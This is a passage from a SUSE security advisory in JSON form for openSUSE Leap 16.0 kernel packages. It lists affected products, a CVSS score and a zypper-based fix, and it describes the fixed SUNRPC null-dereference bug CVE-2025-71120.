"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
